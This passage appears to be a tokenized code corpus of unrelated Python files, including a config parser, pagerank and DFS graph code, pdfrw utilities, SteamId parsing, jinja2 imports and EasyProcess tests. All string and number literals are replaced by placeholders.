<EOL> self . _dict = { } <EOL> for k , v in dict ( * args , ** kw ) . items ( ) : <EOL> self [ k ] = v <EOL> self . sectionname = None <EOL> self . sectiongroupname = None <EOL> self . _config = None <EOL> self . massagers = { } <EOL> def add_massager ( self , massager ) : <EOL> key = ( massager . sectiongroupname , massager . key ) <EOL> existing = self . massagers . get ( key ) <EOL> if existing is not None : <EOL> equal_class = massager . __class__ == existing . __class__ <EOL> equal_vars = vars ( massager ) == vars ( existing ) <EOL> if equal_class and equal_vars : <EOL> return <EOL> raise ValueError ( "<STR_LIT>" % ( massager . key , massager . sectiongroupname ) ) <EOL> self . massagers [ key ] = massager <EOL> def __delitem__ ( self , key ) : <EOL> del self . _dict [ key ] <EOL> def get_path ( self , key , default = _marker ) : <EOL> if default is not _marker : <EOL> if key not in self . _dict : <EOL> return default <EOL> return self . _dict [ key ] . path <EOL> def __getitem__ ( self , key ) : <EOL> if key == '<STR_LIT>' : <EOL> return self . sectiongroupname <EOL> if key == '<STR_LIT>' : <EOL> return self . sectionname <EOL> if key in self . _dict : <EOL> if self . _config is not None : <EOL> massage = self . _config . massagers . get ( ( self . sectiongroupname , key ) ) <EOL> if not callable ( massage ) : <EOL> massage = self . _config . massagers . get ( ( None , key ) ) <EOL> if callable ( massage ) : <EOL> if len ( inspect . getargspec ( massage . __call__ ) . args ) == <NUM_LIT:3> : <EOL> return massage ( self , self . sectionname ) <EOL> else : <EOL> return massage ( self , self . sectiongroupname , self . sectionname ) <EOL> else : <EOL> return massage ( self , self . sectionname ) <EOL> massage = self . massagers . get ( ( self . sectiongroupname , key ) ) <EOL> if callable ( massage ) : <EOL> return massage ( self , self . sectionname ) <EOL> value = self . _dict [ key ] <EOL> if isinstance ( value , ConfigValue ) : <EOL> return value . value <EOL> return value <EOL> def __setitem__ ( self , key , value ) : <EOL> if not isinstance ( value , ConfigValue ) : <EOL> src = None <EOL> if not isinstance ( value , ConfigSection ) : <EOL> src = get_caller_src ( ) <EOL> value = ConfigValue ( None , value , src = src ) <EOL> self . _dict [ key ] = value <EOL> def keys ( self ) : <EOL> return self . _dict . keys ( ) <EOL> def __len__ ( self ) : <EOL> return len ( self . _dict ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . keys ( ) ) <EOL> def copy ( self ) : <EOL> new = ConfigSection ( ) <EOL> new . _dict = self . _dict . copy ( ) <EOL> new . sectionname = self . sectionname <EOL> new . sectiongroupname = self . sectiongroupname <EOL> new . massagers = self . massagers . copy ( ) <EOL> new . _config = self . _config <EOL> return new <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , dict ( self ) ) <EOL> class Config ( ConfigSection ) : <EOL> def _expand ( self , sectiongroupname , sectionname , section , seen ) : <EOL> if ( sectiongroupname , sectionname ) in seen : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> seen . add ( ( sectiongroupname , sectionname ) ) <EOL> macronames = section [ '<STR_LIT:<>' ] . split ( ) <EOL> for macroname in macronames : <EOL> if '<STR_LIT::>' in macroname : <EOL> macrogroupname , macroname = macroname . split ( '<STR_LIT::>' ) <EOL> else : <EOL> macrogroupname = sectiongroupname <EOL> macro = self [ macrogroupname ] [ macroname ] <EOL> if '<STR_LIT:<>' in macro : <EOL> self . _expand ( macrogroupname , macroname , macro , seen ) <EOL> if sectiongroupname in self . macro_cleaners : <EOL> macro = macro . copy ( ) <EOL> self . macro_cleaners [ sectiongroupname ] ( macro ) <EOL> for key in macro : <EOL> if key not in section : <EOL> section . _dict [ key ] = macro . _dict [ key ] <EOL> del section [ '<STR_LIT:<>' ] <EOL> def __init__ ( self , config , path = None , bbb_config = False , plugins = None ) : <EOL> ConfigSection . __init__ ( self ) <EOL> self . config = config <EOL> if path is None : <EOL> if getattr ( config , '<STR_LIT>' , None ) is None : <EOL> path = os . path . dirname ( config ) <EOL> self . path = path <EOL> self . macro_cleaners = { } <EOL> if plugins is not None : <EOL> for plugin in plugins . values ( ) : <EOL> for massager in plugin . get ( '<STR_LIT>' , lambda : [ ] ) ( ) : <EOL> self . add_massager ( massager ) <EOL> if '<STR_LIT>' in plugin : <EOL> self . macro_cleaners . update ( plugin [ '<STR_LIT>' ] ( self ) ) <EOL> def read_config ( self , config ) : <EOL> result = [ ] <EOL> stack = [ config ] <EOL> while <NUM_LIT:1> : <EOL> config = stack . pop ( ) <EOL> src = None <EOL> if isinstance ( config , ( str , unicode ) ) : <EOL> src = os . path . relpath ( config ) <EOL> _config = RawConfigParser ( ) <EOL> _config . optionxform = lambda s : s <EOL> if getattr ( config , '<STR_LIT>' , None ) is not None : <EOL> _config . readfp ( config ) <EOL> path = self . path <EOL> else : <EOL> if not os . path . exists ( config ) : <EOL> log . error ( "<STR_LIT>" , config ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> _config . read ( config ) <EOL> path = os . path . dirname ( config ) <EOL> for section in reversed ( _config . sections ( ) ) : <EOL> for key , value in reversed ( _config . items ( section ) ) : <EOL> result . append ( ( src , path , section , key , value ) ) <EOL> result . append ( ( src , path , section , None , None ) ) <EOL> if _config . has_option ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> extends = _config . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> elif _config . has_option ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> extends = _config . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> else : <EOL> break <EOL> stack [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ <EOL> os . path . abspath ( os . path . join ( path , x ) ) <EOL> for x in reversed ( extends ) ] <EOL> return reversed ( result ) <EOL> def get_section ( self , sectiongroupname , sectionname ) : <EOL> sectiongroup = self [ sectiongroupname ] <EOL> if sectionname not in sectiongroup : <EOL> section = ConfigSection ( ) <EOL> section . sectiongroupname = sectiongroupname <EOL> section . sectionname = sectionname <EOL> section . _config = proxy ( self ) <EOL> sectiongroup [ sectionname ] = section <EOL> return sectiongroup [ sectionname ] <EOL> def parse ( self ) : <EOL> _config = self . read_config ( self . config ) <EOL> for src , path , configsection , key , value in _config : <EOL> if '<STR_LIT::>' in configsection : <EOL> sectiongroupname , sectionname = configsection . split ( '<STR_LIT::>' ) <EOL> else : <EOL> sectiongroupname , sectionname = '<STR_LIT>' , configsection <EOL> if sectiongroupname == '<STR_LIT>' and sectionname == '<STR_LIT>' and key == '<STR_LIT>' : <EOL> continue <EOL> sectiongroup = self . setdefault ( sectiongroupname , ConfigSection ( ) ) <EOL> self . get_section ( sectiongroupname , sectionname ) <EOL> if key is not None : <EOL> if key == '<STR_LIT>' : <EOL> for spec in value . splitlines ( ) : <EOL> spec = spec . strip ( ) <EOL> if not spec : <EOL> continue <EOL> if '<STR_LIT:=>' not in spec : <EOL> log . error ( "<STR_LIT>" , spec , sectiongroupname , sectionname ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> massager_key , massager = spec . split ( '<STR_LIT:=>' ) <EOL> massager_key = massager_key . strip ( ) <EOL> massager = massager . strip ( ) <EOL> if '<STR_LIT::>' in massager_key : <EOL> parts = tuple ( x . strip ( ) for x in massager_key . split ( '<STR_LIT::>' ) ) <EOL> if len ( parts ) == <NUM_LIT:2> : <EOL> massager_sectiongroupname , massager_key = parts <EOL> massager_sectionname = None <EOL> elif len ( parts ) == <NUM_LIT:3> : <EOL> massager_sectiongroupname , massager_sectionname , massager_key = parts <EOL> else : <EOL> log . error ( "<STR_LIT>" , spec , sectiongroupname , sectionname ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if massager_sectiongroupname == '<STR_LIT>' : <EOL> massager_sectiongroupname = sectiongroupname <EOL> if massager_sectiongroupname == '<STR_LIT:*>' : <EOL> massager_sectiongroupname = None <EOL> if massager_sectionname == '<STR_LIT>' : <EOL> massager_sectionname = sectionname <EOL> else : <EOL> massager_sectiongroupname = sectiongroupname <EOL> massager_sectionname = sectionname <EOL> try : <EOL> massager = resolve_dotted_name ( massager ) <EOL> except ImportError as e : <EOL> log . error ( "<STR_LIT>" , massager , unicode ( e ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except AttributeError as e : <EOL> log . error ( "<STR_LIT>" , massager , unicode ( e ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> massager = massager ( massager_sectiongroupname , massager_key ) <EOL> if massager_sectionname is None : <EOL> self . add_massager ( massager ) <EOL> else : <EOL> massager_section = self . get_section ( <EOL> sectiongroupname , massager_sectionname ) <EOL> massager_section . add_massager ( massager ) <EOL> else : <EOL> sectiongroup [ sectionname ] [ key ] = ConfigValue ( path , value , src = src ) <EOL> if '<STR_LIT>' in self : <EOL> warnings . warn ( "<STR_LIT>" ) <EOL> del self [ '<STR_LIT>' ] <EOL> seen = set ( ) <EOL> for sectiongroupname in self : <EOL> sectiongroup = self [ sectiongroupname ] <EOL> for sectionname in sectiongroup : <EOL> section = sectiongroup [ sectionname ] <EOL> if '<STR_LIT:<>' in section : <EOL> self . _expand ( sectiongroupname , sectionname , section , seen ) <EOL> return self <EOL> def get_section_with_overrides ( self , sectiongroupname , sectionname , overrides ) : <EOL> config = self [ sectiongroupname ] [ sectionname ] . copy ( ) <EOL> if overrides is not None : <EOL> config . _dict . update ( overrides ) <EOL> return config </s>
<s> from setuptools import setup <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> install_requires = install_requires , <EOL> test_suite = '<STR_LIT>' , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) </s>
<s> """<STR_LIT>""" <EOL> def traversal ( graph , node , order ) : <EOL> """<STR_LIT>""" <EOL> visited = { } <EOL> if ( order == '<STR_LIT>' ) : <EOL> pre = <NUM_LIT:1> <EOL> post = <NUM_LIT:0> <EOL> elif ( order == '<STR_LIT>' ) : <EOL> pre = <NUM_LIT:0> <EOL> post = <NUM_LIT:1> <EOL> for each in _dfs ( graph , visited , node , pre , post ) : <EOL> yield each <EOL> def _dfs ( graph , visited , node , pre , post ) : <EOL> """<STR_LIT>""" <EOL> visited [ node ] = <NUM_LIT:1> <EOL> if ( pre ) : yield node <EOL> for each in graph [ node ] : <EOL> if ( each not in visited ) : <EOL> for other in _dfs ( graph , visited , each , pre , post ) : <EOL> yield other <EOL> if ( post ) : yield node </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from pygraph . classes . digraph import digraph <EOL> from pygraph . algorithms . pagerank import pagerank <EOL> import testlib <EOL> class test_pagerank ( unittest . TestCase ) : <EOL> def test_pagerank_empty ( self ) : <EOL> G = digraph ( ) <EOL> self . assertEqual ( pagerank ( G ) , { } ) <EOL> def test_pagerank_cycle ( self ) : <EOL> G = digraph ( ) <EOL> G . add_nodes ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> G . add_edge ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> G . add_edge ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> G . add_edge ( ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( pagerank ( G ) , { <NUM_LIT:1> : <NUM_LIT> , <NUM_LIT:2> : <NUM_LIT> , <NUM_LIT:3> : <NUM_LIT> , <NUM_LIT:4> : <NUM_LIT> , <NUM_LIT:5> : <NUM_LIT> } ) <EOL> def test_pagerank ( self ) : <EOL> G = digraph ( ) <EOL> G . add_nodes ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:4> ) ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:5> ) ) <EOL> G . add_edge ( ( <NUM_LIT:1> , <NUM_LIT:7> ) ) <EOL> G . add_edge ( ( <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> G . add_edge ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> G . add_edge ( ( <NUM_LIT:3> , <NUM_LIT:2> ) ) <EOL> G . add_edge ( ( <NUM_LIT:4> , <NUM_LIT:2> ) ) <EOL> G . add_edge ( ( <NUM_LIT:4> , <NUM_LIT:3> ) ) <EOL> G . add_edge ( ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:1> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> G . add_edge ( ( <NUM_LIT:5> , <NUM_LIT:6> ) ) <EOL> G . add_edge ( ( <NUM_LIT:6> , <NUM_LIT:1> ) ) <EOL> G . add_edge ( ( <NUM_LIT:6> , <NUM_LIT:5> ) ) <EOL> G . add_edge ( ( <NUM_LIT:7> , <NUM_LIT:5> ) ) <EOL> expected_pagerank = { <EOL> <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:3> : <NUM_LIT> , <EOL> <NUM_LIT:4> : <NUM_LIT> , <EOL> <NUM_LIT:5> : <NUM_LIT> , <EOL> <NUM_LIT:6> : <NUM_LIT> , <EOL> <NUM_LIT:7> : <NUM_LIT> , <EOL> } <EOL> pr = pagerank ( G ) <EOL> for k in pr : <EOL> self . assertAlmostEqual ( pr [ k ] , expected_pagerank [ k ] , places = <NUM_LIT:3> ) <EOL> def test_pagerank_random ( self ) : <EOL> G = testlib . new_digraph ( ) <EOL> md = <NUM_LIT> <EOL> df = <NUM_LIT> <EOL> pr = pagerank ( G , damping_factor = df , min_delta = md ) <EOL> min_value = ( <NUM_LIT:1.0> - df ) / len ( G ) <EOL> for node in G : <EOL> expected = min_value <EOL> for each in G . incidents ( node ) : <EOL> expected += ( df * pr [ each ] / len ( G . neighbors ( each ) ) ) <EOL> assert abs ( pr [ node ] - expected ) < md <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import os <EOL> from pdfrw import PdfReader , PdfWriter <EOL> inpfn = sys . argv [ <NUM_LIT:1> ] <EOL> rotate = sys . argv [ <NUM_LIT:2> ] <EOL> ranges = sys . argv [ <NUM_LIT:3> : ] <EOL> rotate = int ( rotate ) <EOL> assert rotate % <NUM_LIT> == <NUM_LIT:0> <EOL> ranges = [ [ int ( y ) for y in x . split ( '<STR_LIT:->' ) ] for x in ranges ] <EOL> outfn = '<STR_LIT>' % os . path . basename ( inpfn ) <EOL> trailer = PdfReader ( inpfn ) <EOL> pages = trailer . pages <EOL> if not ranges : <EOL> ranges = [ [ <NUM_LIT:1> , len ( pages ) ] ] <EOL> for onerange in ranges : <EOL> onerange = ( onerange + onerange [ - <NUM_LIT:1> : ] ) [ : <NUM_LIT:2> ] <EOL> for pagenum in range ( onerange [ <NUM_LIT:0> ] - <NUM_LIT:1> , onerange [ <NUM_LIT:1> ] ) : <EOL> pages [ pagenum ] . Rotate = ( int ( pages [ pagenum ] . inheritable . Rotate or <EOL> <NUM_LIT:0> ) + rotate ) % <NUM_LIT> <EOL> outdata = PdfWriter ( ) <EOL> outdata . trailer = trailer <EOL> outdata . write ( outfn ) </s>
<s> import static_pdfs <EOL> from pdfrw import PdfReader <EOL> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> class TestPdfReaderInit ( unittest . TestCase ) : <EOL> def test_fname_binary_filelike ( self ) : <EOL> with open ( static_pdfs . pdffiles [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT:rb>' ) as pdf_file : <EOL> PdfReader ( pdf_file ) <EOL> def test_fdata_binary ( self ) : <EOL> with open ( static_pdfs . pdffiles [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT:rb>' ) as pdf_file : <EOL> pdf_bytes = pdf_file . read ( ) <EOL> PdfReader ( fdata = pdf_bytes ) <EOL> def main ( ) : <EOL> unittest . main ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from . __about__ import * </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import re <EOL> STEAM_ACCOUNT_UNIVERSE = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> } <EOL> STEAM_ACCOUNT_TYPE = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : <NUM_LIT:8> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> } <EOL> class SteamId ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , steam_id , id_type = STEAM_ACCOUNT_TYPE [ '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> self . is_bot = False <EOL> self . is_console = False <EOL> if isinstance ( steam_id , int ) : <EOL> ( self . id_number , <EOL> self . y_part , <EOL> self . instance , <EOL> self . id_type , <EOL> self . universe ) = self . split_id64 ( steam_id ) <EOL> elif not isinstance ( steam_id , str ) and not isinstance ( steam_id , unicode ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> else : <EOL> if unicode ( steam_id ) == u'<STR_LIT>' : <EOL> self . is_bot = True <EOL> elif unicode ( steam_id ) == u'<STR_LIT>' : <EOL> self . is_console == True <EOL> else : <EOL> pattern = '<STR_LIT>' . join ( [ <EOL> ur '<STR_LIT>' , <EOL> ur '<STR_LIT>' , <EOL> ] ) <EOL> match = re . match ( pattern , steam_id , re . I | re . U ) <EOL> if not match : <EOL> raise ValueError ( '<STR_LIT>' % steam_id ) <EOL> self . universe = int ( match . groupdict ( ) [ '<STR_LIT>' ] ) <EOL> self . instance = <NUM_LIT:1> <EOL> self . y_part = int ( match . groupdict ( ) [ '<STR_LIT>' ] ) <EOL> self . id_number = int ( match . groupdict ( ) [ '<STR_LIT>' ] ) <EOL> self . id_type = id_type <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __unicode__ ( self ) : <EOL> if self . is_bot : <EOL> return u'<STR_LIT>' <EOL> elif self . is_console : <EOL> return u'<STR_LIT>' <EOL> else : <EOL> return self . id64_to_str ( self . id64 ( ) ) <EOL> def id64 ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_bot or self . is_console : <EOL> return <NUM_LIT:0> <EOL> id64 = self . id_number * <NUM_LIT:2> <EOL> id64 += self . y_part <EOL> id64 |= self . instance << <NUM_LIT:32> <EOL> id64 |= self . id_type << <NUM_LIT> <EOL> id64 |= self . universe << <NUM_LIT> <EOL> return id64 <EOL> @ classmethod <EOL> def id64_to_str ( cls , id64 , universe = STEAM_ACCOUNT_UNIVERSE [ '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> ( id_number , y_part , instance , id_type , universe ) = SteamId . split_id64 ( id64 ) <EOL> return u'<STR_LIT>' % ( universe , y_part , id_number ) <EOL> @ classmethod <EOL> def split_id64 ( cls , id64 ) : <EOL> """<STR_LIT>""" <EOL> y_part = id64 % <NUM_LIT:2> <EOL> id_number = ( id64 & <NUM_LIT> - y_part ) // <NUM_LIT:2> <EOL> instance = ( id64 & <NUM_LIT> ) >> <NUM_LIT:32> <EOL> id_type = ( id64 & <NUM_LIT> ) >> <NUM_LIT> <EOL> universe = ( id64 & <NUM_LIT> ) >> <NUM_LIT> <EOL> return ( id_number , y_part , instance , id_type , universe ) <EOL> class BasePlayer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , uid , steam_id , team = u'<STR_LIT>' ) : <EOL> if not isinstance ( steam_id , SteamId ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if isinstance ( name , str ) : <EOL> name = unicode ( name , '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) <EOL> self . name = name <EOL> if isinstance ( uid , str ) or isinstance ( uid , unicode ) : <EOL> uid = int ( uid ) <EOL> self . uid = uid <EOL> self . steam_id = steam_id <EOL> if team is None : <EOL> team = u'<STR_LIT>' <EOL> self . team = team <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __unicode__ ( self ) : <EOL> msg = [ <EOL> self . name , <EOL> u'<STR_LIT>' % self . uid , <EOL> u'<STR_LIT>' % self . steam_id , <EOL> ] <EOL> if self . team is not None : <EOL> msg . append ( u'<STR_LIT>' % self . team ) <EOL> return u'<STR_LIT>' . join ( msg ) </s>
<s> import os <EOL> from setuptools import setup <EOL> README = open ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) . read ( ) <EOL> os . chdir ( os . path . normpath ( os . path . join ( os . path . abspath ( __file__ ) , os . pardir ) ) ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> include_package_data = True , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = README , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from __future__ import unicode_literals , absolute_import , division , print_function <EOL> HAND1 = """<STR_LIT>""" <EOL> HAND2 = """<STR_LIT>""" <EOL> HAND3 = """<STR_LIT>""" <EOL> HAND4 = """<STR_LIT>""" <EOL> HAND5 = """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> from jinja2 . environment import Environment , Template <EOL> from jinja2 . loaders import BaseLoader , FileSystemLoader , PackageLoader , DictLoader , FunctionLoader , PrefixLoader , ChoiceLoader , ModuleLoader <EOL> from jinja2 . bccache import BytecodeCache , FileSystemBytecodeCache , MemcachedBytecodeCache <EOL> from jinja2 . runtime import Undefined , DebugUndefined , StrictUndefined <EOL> from jinja2 . exceptions import TemplateError , UndefinedError , TemplateNotFound , TemplatesNotFound , TemplateSyntaxError , TemplateAssertionError <EOL> from jinja2 . filters import environmentfilter , contextfilter , evalcontextfilter <EOL> from jinja2 . utils import Markup , escape , clear_caches , environmentfunction , evalcontextfunction , contextfunction , is_undefined <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] </s>
<s> import logging <EOL> from polaris_health import Error <EOL> __all__ = [ '<STR_LIT>' ] <EOL> LOG = logging . getLogger ( __name__ ) <EOL> LOG . addHandler ( logging . NullHandler ( ) ) <EOL> MAX_NAME_LEN = <NUM_LIT> <EOL> MAX_POOL_NAME_LEN = <NUM_LIT> <EOL> MIN_TTL = <NUM_LIT:1> <EOL> class GlobalName : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , pool_name , ttl ) : <EOL> """<STR_LIT>""" <EOL> self . name = name . lower ( ) <EOL> if ( not isinstance ( name , str ) or len ( name ) == <NUM_LIT:0> <EOL> or len ( name ) > MAX_NAME_LEN ) : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( name , MAX_NAME_LEN ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> self . pool_name = pool_name <EOL> if ( not isinstance ( pool_name , str ) or len ( pool_name ) == <NUM_LIT:0> <EOL> or len ( pool_name ) > MAX_POOL_NAME_LEN ) : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( pool_name , MAX_POOL_NAME_LEN ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> self . ttl = ttl <EOL> if ( not isinstance ( ttl , int ) or ttl < MIN_TTL ) : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( ttl , MIN_TTL ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> @ classmethod <EOL> def from_config_dict ( cls , name , obj ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in obj : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( name ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> if '<STR_LIT>' not in obj : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( name ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> return cls ( name = name , pool_name = obj [ '<STR_LIT>' ] , ttl = obj [ '<STR_LIT>' ] ) <EOL> def to_dist_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = { } <EOL> obj [ '<STR_LIT>' ] = self . pool_name <EOL> obj [ '<STR_LIT>' ] = self . ttl <EOL> return obj </s>
<s> from easyprocess import EasyProcess <EOL> from nose . tools import eq_ , timed , ok_ <EOL> from unittest import TestCase <EOL> import sys <EOL> python = sys . executable <EOL> class Test ( TestCase ) : <EOL> def test_timeout ( self ) : <EOL> p = EasyProcess ( '<STR_LIT>' ) . start ( ) <EOL> p . wait ( <NUM_LIT> ) <EOL> eq_ ( p . is_alive ( ) , True ) <EOL> p . wait ( <NUM_LIT> ) <EOL> eq_ ( p . is_alive ( ) , True ) <EOL> p . wait ( <NUM_LIT:2> ) <EOL> eq_ ( p . is_alive ( ) , False ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( ) . return_code == <NUM_LIT:0> , True ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:0.1> ) . return_code == <NUM_LIT:0> , False ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:1> ) . return_code == <NUM_LIT:0> , True ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( ) . timeout_happened , False ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:0.1> ) . timeout_happened , True ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:1> ) . timeout_happened , False ) <EOL> @ timed ( <NUM_LIT:3> ) <EOL> def test_time_cli1 ( self ) : <EOL> p = EasyProcess ( <EOL> [ python , '<STR_LIT:-c>' , "<STR_LIT>" ] ) <EOL> p . call ( ) <EOL> eq_ ( p . return_code , <NUM_LIT:0> ) <EOL> @ timed ( <NUM_LIT:3> ) <EOL> def test_time_cli2 ( self ) : <EOL> p = EasyProcess ( <EOL> [ python , '<STR_LIT:-c>' , "<STR_LIT>" ] ) <EOL> p . call ( ) <EOL> eq_ ( p . return_code , <NUM_LIT:0> ) <EOL> @ timed ( <NUM_LIT:3> ) <EOL> def test_time2 ( self ) : <EOL> p = EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:1> ) <EOL> eq_ ( p . is_alive ( ) , False ) <EOL> eq_ ( p . timeout_happened , True ) <EOL> ok_ ( p . return_code < <NUM_LIT:0> ) <EOL> eq_ ( p . stdout , '<STR_LIT>' ) <EOL> @ timed ( <NUM_LIT:3> ) <EOL> 